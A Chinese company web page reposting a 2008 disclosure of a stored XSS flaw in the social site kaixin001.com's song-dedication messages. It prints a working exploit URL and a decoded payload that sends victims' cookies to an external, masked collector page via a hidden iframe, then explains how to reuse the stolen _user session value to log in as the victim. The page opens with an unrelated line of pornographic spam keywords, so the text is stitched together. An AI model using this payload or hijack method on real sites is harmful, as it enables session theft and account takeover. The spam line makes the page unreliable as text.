欧美激情网,国产欧美亚洲高清,欧美屁股xxxxx,欧美群妇大交群,欧美人与物ⅴideos另类,区二区三区在线 | 欧洲

知識(shí)學(xué)堂
  • ·聯(lián)系電話(huà):+86.023-75585550
  • ·聯(lián)系傳真:+86.023-75585550
  • ·24小時(shí)手機(jī):13896886023
  • ·QQ 咨 詢(xún):361652718 513960520
當(dāng)前位置 > 首頁(yè) > 知識(shí)學(xué)堂 > 網(wǎng)站建設(shè)知識(shí)
開(kāi)心網(wǎng)(kaixin001.com) XSS漏洞
更新時(shí)間:2011-11-22 | 發(fā)布人:本站 | 點(diǎn)擊率:517
2008.9.25,我公布"國(guó)內(nèi)郵箱系統(tǒng)爆發(fā)大規(guī)?缯韭┒"后,F(xiàn)ireF0X就和我說(shuō),什么時(shí)候弄個(gè)XSS的主題寫(xiě)寫(xiě),讓大家也一起討論一下。說(shuō)來(lái)慚愧,也一直沒(méi)寫(xiě)什么東西,這次在"火狐"公布"Kaixin001.comXSS漏洞",也算是給他有個(gè)交代吧。

開(kāi)心網(wǎng)是一個(gè)在線(xiàn)社區(qū),通過(guò)它您可以與朋友、同學(xué)、同事、家人保持更緊密的聯(lián)系,及時(shí)了解他們的動(dòng)態(tài);與他們分享你的照片、心情、快樂(lè)。

漏洞描述:

開(kāi)心網(wǎng)(www.kaixin001.com),當(dāng)你在給好友點(diǎn)歌時(shí),你可以留言,而開(kāi)心對(duì)用戶(hù)留言的數(shù)據(jù)沒(méi)有進(jìn)行嚴(yán)格過(guò)濾,導(dǎo)致攻擊者可以提交惡意代碼,進(jìn)行跨站攻擊。攻擊者利用該漏洞可以盜取開(kāi)心網(wǎng)用戶(hù)的cookie,然后利用Cookie欺騙冒充該用戶(hù)進(jìn)行賬號(hào)登錄。危害嚴(yán)重。

代碼利用:

http://www.kaixin001.com/music/ordermusic.php?verify=××××_1006_××××_1228989163_×××××&musicid=32331139&musichost=×××××&mid=924962&orderuids=×××××&word=%3Cimg+src%3D%22x%22+onerror%3D%22document.write%28%27%3Ciframe+src%3Dhttp%3A%2F%2Fwww.×××××.com%2Fxss%2Fxsscu.asp%3F%27%2Bescape%28document.cookie%29%2B%27+width%3D0++height%3D0++border%3D0%3E%3C%2Fiframe%3E%27%29%22%3E%0D%0A&group=&quiet=1

verify參數(shù)作用是驗(yàn)證用戶(hù)身份
musicid參數(shù)是給好友點(diǎn)播歌曲的ID號(hào)
musichost是自己的開(kāi)心網(wǎng)ID
orderuids是好友開(kāi)心網(wǎng)ID
word是點(diǎn)歌時(shí)留言?xún)?nèi)容
group 用戶(hù)組
quiet 悄悄地(將不會(huì)出現(xiàn)在好友的動(dòng)態(tài)中)
word參數(shù)后可以加入精心構(gòu)造的跨站代碼。

盜取Cookie提交代碼:<img src="x" onerror="document.write('<iframesrc=http://www.×××.com/xss/xsscu.asp?'+escape(document.cookie)+' width=0 height=0 border=0></iframe>')">
這段明文盜取COOKIE代碼,你要轉(zhuǎn)化為URL編碼后再提交。
當(dāng)點(diǎn)歌成功后,惡意代碼將以系統(tǒng)消息的形式,發(fā)送給受害者。系統(tǒng)會(huì)告訴受害者,你的朋友×××給你點(diǎn)了一首歌。

開(kāi)心網(wǎng)的COOKIE(其實(shí)是Session)格式如下:
SERVERID=_srv102-125_;
_user=3b45065b00978846edecd20e6dae7710_×××××_1226381918;
_email=×××××%40126.com; _invisible=0。
你只要把_user中的參數(shù)替換掉,就可以利用受害者的帳號(hào)進(jìn)行登錄了。

附圖一張:用SESSIONIE,來(lái)收取開(kāi)心COOKIE。

PS:敏感數(shù)據(jù)我用××××代替了,這個(gè)漏洞是首發(fā),希望大家不要拿它做什么壞事哦,希望大家多多交流,火狐越來(lái)越好。